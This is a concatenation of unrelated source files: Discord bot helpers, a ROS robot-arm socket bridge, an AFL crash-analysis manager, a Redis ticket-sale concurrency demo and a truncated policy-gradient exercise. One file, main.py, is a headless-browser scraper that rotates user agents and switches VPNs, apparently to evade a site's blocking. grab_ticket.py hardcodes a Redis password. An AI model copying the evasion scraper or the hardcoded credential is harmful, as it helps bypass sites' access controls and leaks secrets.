"https://images-ext-2.discordapp.net/external/YTk-6Mfxbbr8KwIc-3Pyy5Z_06tfpcO65MflxYgbjA8/%3Fcid%3D73b8f7b119cc9225923f70c7e25a1f8e8932c7ae8ef48fe7%26rid%3Dgiphy.mp4%26ct%3Dg/https/media2.giphy.com/media/Ju7l5y9osyymQ/giphy.mp4",
ephemeral=True,
)
except discord.errors.InteractionResponded:
await interaction.followup.send(
"https://images-ext-2.discordapp.net/external/YTk-6Mfxbbr8KwIc-3Pyy5Z_06tfpcO65MflxYgbjA8/%3Fcid%3D73b8f7b119cc9225923f70c7e25a1f8e8932c7ae8ef48fe7%26rid%3Dgiphy.mp4%26ct%3Dg/https/media2.giphy.com/media/Ju7l5y9osyymQ/giphy.mp4",
ephemeral=True,
)
self.value = True
class TicketLockButton(discord.ui.View):
def __init__(self, bot):
super().__init__(timeout=None)
self.value = None
self.bot = bot
@discord.ui.button(
label="Lock",
style=discord.ButtonStyle.green,
custom_id="persistent_view:lock",
emoji="🔒",
)
async def lock(self, button: discord.ui.Button, interaction: discord.Interaction):
self.value = True
ch = await self.bot.fetch_channel(interaction.channel_id)
TempConfirmInstance = TicketTempConfirm(self.bot)
msg = await ch.send(
"Are you sure you want to close this ticket?", view=TempConfirmInstance
)
class TicketTempConfirm(discord.ui.View):
def __init__(self):
super().__init__()
self.value = None
@discord.ui.button(
label="Confirm",
style=discord.ButtonStyle.green,
emoji="✅",
custom_id="persistent_view:tempconfirm",
)
async def confirm(
self, button: discord.ui.Button, interaction: discord.Interaction
):
self.value = True
self.stop()
@discord.ui.button(label="Cancel", style=discord.ButtonStyle.red, emoji="❌")
async def cancel(self, button: discord.ui.Button, interaction: discord.Interaction):
await interaction.response.send_message("Cancelling", ephemeral=True)
self.value = False
self.stop()
class FeedbackModel(discord.ui.Modal):
def __init__(self) -> None:
super().__init__("Submit Feedback")
self.add_item(
discord.ui.InputText(
label="What did you try to do?",
style=discord.InputTextStyle.long,
)
)
self.add_item(
discord.ui.InputText(
label="Describe the steps to reproduce the issue",
style=discord.InputTextStyle.short,
)
)
self.add_item(
discord.ui.InputText(
label="What happened?",
style=discord.InputTextStyle.long,
)
)
self.add_item(
discord.ui.InputText(
label="What was supposed to happen?",
style=discord.InputTextStyle.long,
)
)
self.add_item(
discord.ui.InputText(
label="Anything else?",
style=discord.InputTextStyle.long,
required=False,
)
)
async def callback(self, interaction: discord.Interaction):
response = f"User Action: {self.children[0].value}\nSteps to reproduce the issue: {self.children[1].value}\nWhat happened: {self.children[2].value}\nExpected Result: {self.children[3].value}\nAnything else: {self.children[4].value}"
url = f"https://sentry.io/api/0/projects/schoolsimplified/timmy/user-feedback/"
headers = {"Authorization": f'Bearer {os.getenv("FDB_SENTRY")}'}
data = {
"event_id": sentry_sdk.last_event_id(),
"name": interaction.user.name,
"id": interaction.user.id,
"comments": response,
}
response = requests.post(url, headers=headers, data=str(data))
class FeedbackButton(discord.ui.View):
def __init__(self):
super().__init__(timeout=500.0)
self.value = None
@discord.ui.button(
label="Submit Feedback",
style=discord.ButtonStyle.blurple,
custom_id="persistent_view:feedback_button",
emoji="📝",
)
async def feedback_button(
self, button: discord.ui.Button, interaction: discord.Interaction
):
modal = FeedbackModel()
return await interaction.response.send_modal(modal)
async def id_generator(size=3, chars=string.ascii_uppercase):
while True:
ID = "".join(random.choice(chars) for _ in range(size))
query = database.TutorBot_Sessions.select().where(
database.TutorBot_Sessions.SessionID == ID
)
if query.exists():
continue
else:
return ID
async def force_restart(ctx):
p = subprocess.run(
"git status -uno", shell=True, text=True, capture_output=True, check=True
)
embed = discord.Embed(
title="Restarting...",
description="Doing GIT Operation (1/3)",
color=discord.Color.green(),
)
embed.add_field(
name="Checking GIT (1/3)", value=f"**Git Output:**\n```shell\n{p.stdout}\n```"
)
msg = await ctx.send(embed=embed)
try:
result = subprocess.run(
"cd && cd Timmy-SchoolSimplified",
shell=True,
text=True,
capture_output=True,
check=True,
)
theproc = subprocess.Popen([sys.executable, "main.py"])
runThread = Thread(target=theproc.communicate)
runThread.start()
embed.add_field(
name="Started Environment and Additional Process (2/3)",
value="Executed `source` and `nohup`.",
inline=False,
)
await msg.edit(embed=embed)
except Exception as e:
embed = discord.Embed(
title="Operation Failed", description=e, color=discord.Color.red()
)
embed.set_footer(text="Main bot process will be terminated.")
await ctx.send(embed=embed)
else:
embed.add_field(
name="Killing Old Bot Process (3/3)",
value="Executing `sys.exit(0)` now...",
inline=False,
)
await msg.edit(embed=embed)
sys.exit(0)
def getHostDir():
"""
Get the directory of the current host.
Format: /home/<HOST>/
-> which 'HOST' is either 'timmya` or 'timmy-beta'
NOTE: THIS ONLY WORKS ON THE VPS.
"""
runPath = os.path.realpath(__file__)
runDir = re.search("/home/[^/]*", runPath)
print(runPath)
if runDir is not None:
runDir = runDir.group(0)
else:
runDir = None
print(runDir)
return runDir
def stringTimeConvert(string: str):
"""
Filters out the different time units from a string (e.g. from '2d 4h 6m 7s') and returns a ``dict``.
NOTE: The sequence of the time units doesn't matter. Could also be '6m 2d 7s 4h'.
Params:
string: The string which should get converted to the time units. (e.g. '2d 4h 6m 7s')
Returns: A ``dict`` which the keys are 'days', 'hours', 'minutes', 'seconds' and the value is either a ``int`` or ``None``.
"""
timeDict: dict = {}
days = re.search("\d+d", string)
hours = re.search("\d+h", string)
minutes = re.search("\d+m", string)
seconds = re.search("\d+s", string)
if days is not None:
timeDict["days"] = int(days.group(0).strip("d"))
else:
timeDict["days"] = None
if hours is not None:
timeDict["hours"] = int(hours.group(0).strip("h"))
else:
timeDict["hours"] = None
if minutes is not None:
timeDict["minutes"] = int(minutes.group(0).strip("m"))
else:
timeDict["minutes"] = None
if seconds is not None:
timeDict["seconds"] = int(seconds.group(0).strip("s"))
else:
timeDict["seconds"] = None
return timeDict
def searchCustomEmoji(string: str):
"""
Searches for a custom emoji in a specific ``str`` and returns it or None if nothing found.
The custom emoji can either be animated or not.
Params:
string: The string which should get searched for a custom emoji.
Returns: The custom emoji (``str``) or None if nothing found.
"""
customEmoji = re.search("<[^:]*:[^:]*:(\d)+>", string)
if customEmoji is not None:
customEmoji = customEmoji.group(0)
else:
customEmoji = None
return customEmoji |
HiwinRA605_socket_ros_test_20190626123236.py | #!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
#Socket_command()
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
Socket_command()
print("cmd")
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
#Socket_command()
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
speed_mode_flag = False
point_data_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
if start_input == 3:
rospy.on_shutdown(myhook)
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line |
main.py | from selenium import webdriver
import time
from selenium.webdriver.firefox.options import Options
import os
import random
import json
import threading
from os import path
from requests import get
import tqdm
from html.parser import HTMLParser
import re
from datetime import datetime
from vpnswitch import *
class HTMLFilter(HTMLParser):
text = ""
def handle_data(self, data):
self.text += data
import os, sys, subprocess, json, argparse, signal
from subprocess import Popen, PIPE, STDOUT, TimeoutExpired
import random
from datetime import datetime
class OBJ:
def __init__(self,url,worker_count,user_agents,inputfile,outputfile,vpn,reset):
self.user_agents = user_agents
self.url = url
self.worker_count = worker_count
self.input_file = inputfile
self.output_file = outputfile
self.vpn = vpn
self.reset = reset
def randagent(self):
return random.choice(self.user_agents)
def search(self,job,id,reset_time=60):
count = 0
while True:
time.sleep(random.random())
try:
options = Options()
options.add_argument('--headless')
print("Worker",id,"INIT")
profile = webdriver.FirefoxProfile()
profile.set_preference("general.useragent.override", self.randagent())
driver = webdriver.Firefox(options=options, firefox_profile=profile)
driver.set_window_size(random.randint(500,1000), random.randint(500,1000))
driver.set_page_load_timeout(15)
print("Worker",id,"Agent:",driver.execute_script("return navigator.userAgent"))
time.sleep(random.random()*5)
query_url = self.url.format(job)
print("Worker",id,"Query",query_url)
driver.get(query_url)
raw_source = driver.page_source
driver.quit()
del driver
print("Worker",id,"Response:")
print(datetime.now().time().strftime("%H:%M:%S"))
f = HTMLFilter()
f.feed(raw_source)
print(f.text)
processed = f.text
print("Worker",id,"RECV",len(raw_source))
return processed
except KeyboardInterrupt:
exit()
except Exception as e:
count +=1
if count>3:
return -1,-1
print("WOKR:",id,'ERR',str(e))
try:
driver.quit()
del driver
except:
pass
time.sleep(reset_time)
continue
def worker(self,id_job,wid,output):
print(f"{wid} worker booted")
for i in range(len(id_job)):
uname = id_job[i]
result = self.search(uname,wid)
print("YOU MAY WANT TO PROCESS RESULT HERE")
assert 0 == 1
des = open(self.output_file,"a")
des.write("{}\n".format(result))
des.close()
print("Worker",wid,"Job", i,'/',len(id_job))
print(f"{wid} worker ended")
def start(self):
allid = []
todo = []
done = []
prefix = []
print("Loading file")
csvfile = open(self.input_file,'r')
lines = csvfile.readlines()
for line in lines:
try:
allid.append(line.strip())
except:
pass
print("Data loaded,", len(allid),"found")
csvfile.close()
try:
csvfile = open(self.output_file)
except:
csvfile = open(self.output_file,'w')
csvfile.close()
csvfile = open(self.output_file)
lines = csvfile.readlines()
for line in lines:
try:
row = line.split(",")
done.append(row[1].strip())
except:
pass
print("Data loaded,", len(done),"done")
csvfile.close()
print("Load task todo")
for i in tqdm.tqdm(range(len(allid))):
if allid[i] in done:
done.remove(allid[i])
else:
todo.append(allid[i])
print(len(todo),'job todo')
todo_jobs = []
for i in range(self.worker_count):
todo_jobs.append([])
for i in range(len(todo)):
j = i%self.worker_count
todo_jobs[j].append(todo[i])
threading.Thread(target=vpnsel, args=(self.vpn,self.reset)).start()
for i in range(self.worker_count):
print(i,"worker booting")
threading.Thread(target=self.worker, args=(todo_jobs[i], i, self.output_file)).start()
time.sleep(0.1)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Some tool to query website, automatically switch vpn')
parser.add_argument('--config', metavar='config_file', type=str, required=True,
help='path to configure file.')
args = parser.parse_args()
with open(args.config, 'r') as f:
config = json.loads(f.read())
obj = OBJ(config['url'],config['worker_count'],config['user_agents'],config['input_file'],
config['output_file'],config['vpn_service'],config['vpn_refresh'])
obj.start()
|
analyze_manager.py | #!/usr/bin/env python3
"""
Call this script in order to analyze all founds crashes.
"""
import json
import pathlib
import celery
import os
parentdir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
os.sys.path.insert(0, parentdir)
import helpers.utils
from celery_tasks.tasks import analyze_package
class AnaylzeManager:
def __init__(self, fuzzer_image: str, configurations_dir: str):
self.fuzzer_image = fuzzer_image
self.configuration_dir = configurations_dir
def execute_tasks_through_celery(self):
tasks = []
for package_dir in os.listdir(os.path.join(self.configuration_dir, "fuzz_data")):
if os.path.isdir(os.path.join(self.configuration_dir, "fuzz_data", package_dir)):
import glob
afl_multicore_conf_files = glob.glob(
os.path.join(self.configuration_dir, "fuzz_data", package_dir, "*.afl_config"))
for cfile in afl_multicore_conf_files:
with open(cfile) as fp:
conf_dict = json.load(fp)
afl_out_dir = conf_dict.get("afl_out_dir")
if not afl_out_dir:
print("Analyzer: Skipping {0}, no afl_out_dir found!".format(cfile))
continue
p = pathlib.Path(afl_out_dir)
out_dir = os.path.join(self.configuration_dir, "fuzz_data", str(pathlib.Path(*p.parts[2:])))
if int(helpers.utils.get_afl_stats_from_syncdir(out_dir).get("unique_crashes")) > 0:
print("Querying {0} for analyze!".format(out_dir))
tasks.append(
analyze_package.s(self.fuzzer_image, os.path.abspath(self.configuration_dir), package_dir))
else:
print("Analyzer: Skipping {0}, no crashes found!".format(out_dir))
jobs = celery.group(tasks)
results = jobs.apply_async()
results.get()
results.join()
for res in results.get():
if not res:
return False
return True
"""
Given a list of configurations, start the fuzzing.
The configurations should be in the following order:
Directory, file, ...
"""
# def print_output(chunk):
# print(chunk)
#
#
# q = queue.Queue()
#
# docker_client = docker.from_env()
#
#
# def worker(fuzzer_image, configurations_dir):
# """
# One thread - constantly gets binaries from the queue and works them.
# :return:
# """
# global q
# print("Worker spawned")
# while True:
# next_item = q.get()
# print("Next Item", next_item)
# if next_item is None:
# break
# package, afl_config_file = next_item # json_file is full path, package is just package name
# crashes_config = {}
# conf = {}
# with open(afl_config_file) as afl_config_filepointer:
# try:
# conf.update(json.load(afl_config_filepointer))
# except ValueError: # includes simplejson.decoder.JSONDecodeError
# print('Decoding JSON has failed {0}'.format(afl_config_file))
# continue
# if conf.get("binary_path") is None:
# print("No binary_path for", package)
# continue
# elif not conf.get("invocation_always_possible"):
# print("Invocation not possible", package)
# continue
# else:
# database_file_name = os.path.basename(conf["binary_path"]) + ".db"
# crashes_dir = os.path.basename(conf["binary_path"]) + "_crashes_dir"
# volumes_dict = {
# os.path.abspath(os.path.join(configurations_dir, "fuzz_data")): {"bind": "/results", "mode": "rw"},
# os.path.abspath(os.path.join(configurations_dir, "build_data")): {"bind": "/build", "mode": "rw"},
# }
# analyze_command_params = ["/inputinferer/configfinder/analyze_wrapper.py", "-p", package, "-v",
# "/results/"]
# analyze_command_params += ["-a", conf["afl_out_dir"], "-b", conf["binary_path"], "-v", "/results/",
# "-d", "/results/" + package + "/" + database_file_name, "-c",
# "/results/" + package + "/" + crashes_dir]
# container = docker_client.containers.run(image=fuzzer_image, remove=False, privileged=True,
# entrypoint="python",
# volumes=volumes_dict,
# command=analyze_command_params,
# detach=True, stream=True, stdout=True, stderr=True,
# name=package + "_anaylze_" + str(uuid.uuid4())[:4])
# container_output = ""
# for line in container.logs(stream=True):
# print(line.decode("utf-8").strip())
# container_output += line.decode("utf-8")
# status = container.wait()
# if status["StatusCode"] != 0:
# print(
# "Error while running docker command. Docker Output:\n {0}. Return value {1}".format(
# container_output,
# status[
# "StatusCode"]))
# else:
# crashes_config.update(conf)
# crashes_config["database_file_name"] = database_file_name
# crashes_config["crashes_dir"] = crashes_dir
# crashes_config["package_info"] = package + "_info.txt"
# crash_config_file = configurations_dir + "/" + package + "/" + os.path.basename(
# crashes_config["binary_path"]) + "_" + ".crash_config"
# print("Writing crash config file {0}".format(crash_config_file))
# with open(crash_config_file, "w") as crash_config_filepointer:
# json.dump(crashes_config, crash_config_filepointer)
# print("Task done")
# q.task_done()
#
#
# def worker_package(fuzzer_image, configurations_dir):
# """
# One thread - constantly gets packages from the queue and works them.
# :return:
# """
# global q
# print("Worker spawned")
# while True:
# next_item = q.get()
# print("Next item", next_item)
# if next_item is None:
# break
#
#
#
# def found_crash_for_package(self, package: str):
# contents = [os.path.join(dirpath, filename)
# for (dirpath, dirs, files) in os.walk(os.path.join(self.configuration_dir, package))
# for filename in (dirs + files)]
# for entity in contents:
# if "afl_fuzz" in entity and "crashes" in entity: # entity.endswith("crashes"):
# if len(os.listdir(entity)) > 0:
# return True
# return False
#
#
# def main(number_of_worker_threads: int, logfile: str, fuzzer_image: str, configuration_dir: str):
# global q
# number_of_worker_threads = 1
# afl_config_files = []
# for package_dir in os.listdir(configuration_dir):
# if os.path.isdir(configuration_dir + "/" + package_dir):
# for file in os.listdir(configuration_dir + "/" + package_dir):
# if file.endswith(".afl_config") and found_crash_for_package(configuration_dir):
# afl_config_files.append((package_dir, file))
# threads = []
# for i in range(number_of_worker_threads):
# t = threading.Thread(target=lambda: worker(fuzzer_image, configuration_dir))
# t.start()
# threads.append(t)
# for entity in afl_config_files:
# package = entity[0]
# afl_config_file = configuration_dir + "/" + package + "/" + entity[1]
# print("Putting", afl_config_file, "in queue")
# if not package:
# continue
# q.put((package, afl_config_file))
# q.join()
# for i in range(number_of_worker_threads):
# q.put(None)
# print("Waiting for thread")
# for t in threads:
# t.join()
#
#
# def main_package(number_of_worker_threads: int, logfile: str, fuzzer_image: str, configuration_dir: str):
# global q # type: queue.Queue()
# threads = []
# for i in range(number_of_worker_threads):
# t = threading.Thread(target=lambda: worker_package(fuzzer_image, configuration_dir))
# t.start()
# threads.append(t)
# for package_dir in os.listdir(os.path.join(configuration_dir, "fuzz_data")):
# if os.path.isdir(os.path.join(configuration_dir, "fuzz_data", package_dir)):
# import glob
# afl_multicore_conf_files = glob.glob(os.path.join(configuration_dir, "fuzz_data", package_dir,"*.conf"))
# for cfile in afl_multicore_conf_files:
# with open(cfile) as fp:
# conf_dict = json.load(fp)
# p = pathlib.Path(conf_dict["output"])
# out_dir = os.path.join(configuration_dir, "fuzz_data", str(pathlib.Path(*p.parts[2:])))
# if int(helpers.helpers.get_afl_stats_from_syncdir(out_dir).get("unique_crashes")) > 0:
# q.put(package_dir)
# break
# else:
# print("Package {0} has no crashes, skipping!".format(package_dir))
# if q.qsize() > 0:
# print("Waiting for queue")
# q.join()
# for i in range(number_of_worker_threads):
# q.put(None)
# print("Waiting for thread")
# for t in threads:
# t.join()
# print("Analyzing Done!")
#
#
# if __name__ == "__main__":
# parser = argparse.ArgumentParser(description='Start the building Process')
# parser.add_argument("-c", "--cores", required=False, type=int,
# help="The number of threads to spawn at max, usually how much cores your machine has. Default value for your computer " + str(
# len(os.sched_getaffinity(0))), default=len(os.sched_getaffinity(0)))
# parser.add_argument("-l", "--logfile", required=False, type=str,
# help="The path to the logfile this program should write to", default="log.log")
# parser.add_argument("-pd", "--plots_directory", required=False, type=str,
# help="The directory where the plot images shoud be saved.", default="figures/")
# parser.add_argument("-plot_format", "--plot_format", required=False, choices=["png", "tex"],
# help="In which format should the plots be saved", default="png")
# parser.add_argument("-t", "--timeout", required=False, type=float, help="The timeout for afl", default=1.5)
# parser.add_argument("-di", "--base_image", required=True, type=str, help="Time apt fuzzer image.")
# parser.add_argument("-cd", "--configuration_dir", required=True, type=str,
# help="The directory that contains the configurations")
# arguments = parser.parse_args()
# if not os.path.exists(arguments.configuration_dir) or not os.path.isdir(arguments.configuration_dir):
# raise NotADirectoryError("Configuration Path must be Directory!")
# main(number_of_worker_threads=arguments.cores, logfile=arguments.logfile, fuzzer_image=arguments.base_image,
# configuration_dir=arguments.configuration_dir)
|
grab_ticket.py | import redis
import threading
# 创建连接池
pool = redis.ConnectionPool(host="localhost", port=6379, db=0, password='macintosh')
r = redis.StrictRedis(connection_pool = pool)
KEY = "ticket_count"
# 模拟第i用户进行抢票
def sell(i):
# 初始化 pipe
pipe = r.pipeline()
while True:
try:
# 监视票数
pipe.watch(KEY)
# 查看票数
c = int(pipe.get(KEY))
if c > 0:
# 开始事务
pipe.multi()
c = c-1
pipe.set(KEY, c)
pipe.execute()
print("用户 {} 抢票成功, 当前票数 {}".format(i, c))
break
else:
print("用户 {} 抢票失败, 票卖完了".format(i))
break
except Exception as e:
print("用户{}抢票失败,重试一次".format(i))
continue
finally:
pipe.unwatch()
if __name__ == '__main__':
# 初始化
r.set(KEY, 5)
for i in range(100):
t = threading.Thread(target=sell, args=(i,))
t.start()
|
train_pg.py | import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def normalize(data, mean=0.0, std=1.0):
n_data = (data - np.mean(data)) / (np.std(data) + 1e-8)
return n_data * (std + 1e-8) + mean
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None,
training=False
):
#========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
#========================================================================================#
z = input_placeholder
for i in range(1,n_layers+1):
with tf.variable_scope(scope,reuse=tf.AUTO_REUSE):
if i!=n_layers:
with tf.variable_scope('mlp'+str(i),reuse=tf.AUTO_REUSE):
z = tf.layers.dense(z, units=size, activation=activation) # weight matrix automatically created by the model
z = tf.layers.dropout(z, rate=0.25) #Boolean variable training can
#be set to false to avoid this step during inference
else:
with tf.variable_scope('mlp'+str(n_layers),reuse=tf.AUTO_REUSE):
logits = tf.layers.dense(z, units=output_size, name='logits')
y = tf.nn.softmax(logits, name='ybar')
return logits
def pathlength(path):
return len(path["reward"])
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#print("hellooooooo",ac_dim,env.action_space.shape)
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(dtype=tf.float32, shape=[None], name="adv")
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
